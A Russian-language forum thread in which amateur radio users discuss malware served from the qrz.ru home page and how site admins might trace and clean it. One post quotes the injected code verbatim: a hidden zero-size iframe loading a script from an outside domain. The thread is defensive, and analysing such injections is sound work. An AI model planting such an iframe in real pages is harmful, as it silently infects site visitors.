Вирусы на qrz.ru

[UA6XDX]

Если захожу на главную страницу:http://www.qrz.ru/ - Касперский блокирует, если сразу на форум:http://forum.qrz.ru/ - всё нормально.

[RX3QFY]

Если требуются конструктивные предложения, то могу могу посоветовать один из методов выявления зараженных страниц (уверен, что 9OTY знает об этом, но может быть будет кому-то ещё полезно).

Итак, как я вижу, на главной странице qrz.ru до сих пор находится эксплоит < iframe src="http : // trfistc.info /for.cgi?009" width="0" height="0" style="visibility: hidden;" >< /iframe >. Сейчас он бездействует, т.к. адрес указанный выше выдаёт ERROR 403: Forbidden. Поэтому антивирусы прекратили "кричать", хотя в Google видят этот код и не снимают бан с домейна.
Видать хакеры приостановили свою черную деятельность. Но наверняка временно.

У меня когда-то были подобные проблемы с коммерческими сайтами. Я сделал следующее. Я не стал сразу удалять вредоносный код, а посмотрел на дату последнего изменения файла в котором находится хакерский код. Если файл не был изменён автором сайта после внедрения эксплоита, то по дате можно искать в логах веб сервера (а также ftp и ssh) кем был внесён этот код. По найденным данным (в частности по IP хакера) можно найти и другие пораженные страницы на сайте и вычистить их.

Труднее всего найти дырки, через которые хакеры пролезли, и если дыры не найдены, то необходимо поменять пароли к базе данных, ФТП и другим сервисам сайта, а также произвести апдейты программ типа форумов. Как правило, дыры находят в популярных программах с открытым кодом.

Кстати, надо убрать упоминания о серверных компонентах со страниц сайта. Так например, в HTML можно увидеть
"Powered by Apache 1.3.33 Unix web server + MySQL 4.1 server"
Кому это надо? Правильно, хакерам.

+1
но...

боюсь, ФТП будет недостаточно. см. мой коммент выше

Как раз нет.
1. Зная полный исходник от этой явно зараженной страницы можно вычленить потом фреймы от рекламы и фреймы от вируса.
2. НАВЕРНЯКА у кого-то из админов(кроме пользователя той странички) сидит фрейм на компе. Однозначно. У меня его нет, значит есть возможность вычистить через фтп.

[4Z5LZ / RA9APZ]

1. Зная полный исходник от этой явно зараженной страницы можно вычленить потом фреймы от рекламы и фреймы от вируса.
2. НАВЕРНЯКА у кого-то из админов(кроме пользователя той странички) сидит фрейм на компе. Однозначно. У меня его нет, значит есть возможность вычистить через фтп.

Сперва надо найти другие зараженные места, а потом уже чистить. Если сделать наоборот, то метка времени файла изменится, и в логах не удастся ничего найти.

[RX3QFY]

Сперва надо найти другие зараженные места, а потом уже чистить.

Коллега! Сначала по фтп находим index-файл(index.php или index.html)
Потом смотрим дату изменения. записываем ее. и далее обращаем внимание на содержимое файл. ищем фрейм. копируем код в текстовик.

Если сделать наоборот, то метка времени файла изменится, и в логах не удастся ничего найти.

После всего вышеперечисленного изменение даты не играет роли.

Я не навязываюсь, если администрация нуждается в моей помощи - пусть свяжется со мной.

[RV9CX]

Для разрядки

[RQ3P]

А вот вам: "Лучше туда не ходить! :-)))))))))))
Я ( и куча народу) уже поимели проблемы с баннером сексуального характера!
Серега Илюхин UA9OTY в отпуске, и видать без него как без рук!
73! Александр Сухарев RO9O"

Как баны лепить-так в очередь,а как чистить сайт таки нет никого.....
Запарился уже диск форматировать . Ничего его не берет-менял антивирусники и браузеры -все равно пролезает.......

[RX4HX]

Ничего его не берет-менял антивирусники и браузеры -все равно пролезает.......

Странно вообще. В понедельник вечером на QRZ.ru подцепил вирус-баннер эротического содержания с предложением отправить смс на такой то номер. Пользовался Эксплорером (хоть и знал что не надо))))). Убил вирус - поставил Оперу - все сразу стало ок! Т.е. вирусы все равно лезут, но их антивирусник (у меня Нод32) уже отлавливает.

[RX3QFY]

Сейчас эксплоит запускает инфицирование в фоновом режиме и если антивирь не запрограммирован на отслеживание фонового режима, то Ваш компьютер инфицируется. Если антивирус работает на такое отслеживание, то после 15-секундного таймаута стартовая страница QRZ.RU виснет в IE7. Обращаю внимание ВСЕХ пользователей, что рекомендую создать закладку в браузере на пряму ссылку форума и ТОЛЬКО ПО НЕЙ проходить на форум. Большая просьба к владельцам персональных страниц - НЕ ОБНОВЛЯЙТЕ пока свой контент. Вы можете заразиться на стартовой странице и потом эту заразу пронести через FTP-доступ во внутрь своего сайта.

[RU4UU]

создать закладку в браузере на пряму ссылку форума и ТОЛЬКО ПО НЕЙ проходить на форум.

С самого начала так сделано. Может поэтому ничего нет....

[RQ3P]

С самого начала так сделано. Может поэтому ничего нет....

А вы на главную сходите-потом расскажите.

[UA3AHH]

Приветствую и сожалею, что заходите с эксплоера на QRZ . Там сейчас сидит троян. Думаю это не зловредный вирус, а "шуточный" , который приводит например к исчезновению Раб.стола (пустой экран) или не работает : Пуск - Выключение - Выключение/Перегрузка (только выключение от сети 220в) или соединяется с имеющимися в компе прежними ссылками на порно сайты (откуда наверное и взят образ трояна).
Захожу тоже с эксплоера на qrz , но с другого хард-диска (копия основного). На сайте все это время народ шевелится (есть сообщения, немного) , некоторые даже удивляются из-за чего сыр-бор. Рискую так потому, что всегда имею копии на разные даты рабочего хард-диска под рукой, могу перезаписывать хоть каждый вечер чтоб вернуть в вчерашнее состояние без вирусов.
Рекомендация тем, кто «попал» - HijackThis + Google - как пользоваться.

[RW9JQ]

Если антивирус работает на такое отслеживание, то после 15-секундного таймаута стартовая страница QRZ.RU виснет в IE7.

У меня именно так и происходит,потом выскакивает окно отменить исполнение сценария,скрин я выкладавал раньше!После каждого выхода удаляю все куки и т.д!

[RW9JQ]

Сегодня утром все в порядке стало,захожу без проблем и блокировки снялись,даже скорость загрузки страниц возросла!Не знаю на долго или нет но надо чтобы всегда так было!
------------------------
Видимо админ дошел до своего рабочего места,ура!

[UN7JID]

да, сегодня уже без проблем на форум захожу.С двух разных компов попробовал,два разных антивиря- всё чисто.
На главной трабл остался.Ругается ещё пока.

[borman]

Вырубил скрипты и захожу с главной. Три банера с "предупреждением". Но они уже выглядят как часть страницы:
1. НОВЫЙ РАДИОЛЮБИТЕЛЬСКИЙ РЕФЛЕКТОР "HamBiz", с подпиской
2. Фрейм - Автоматические антенные тюнеры
3. Фрейм - Begun Купим рекламу на вашем сайте
---------------------
Это всё баннеры с "дружественных сайтов"?
P.S. Дальше рыть не стал. Пусть админы пороют.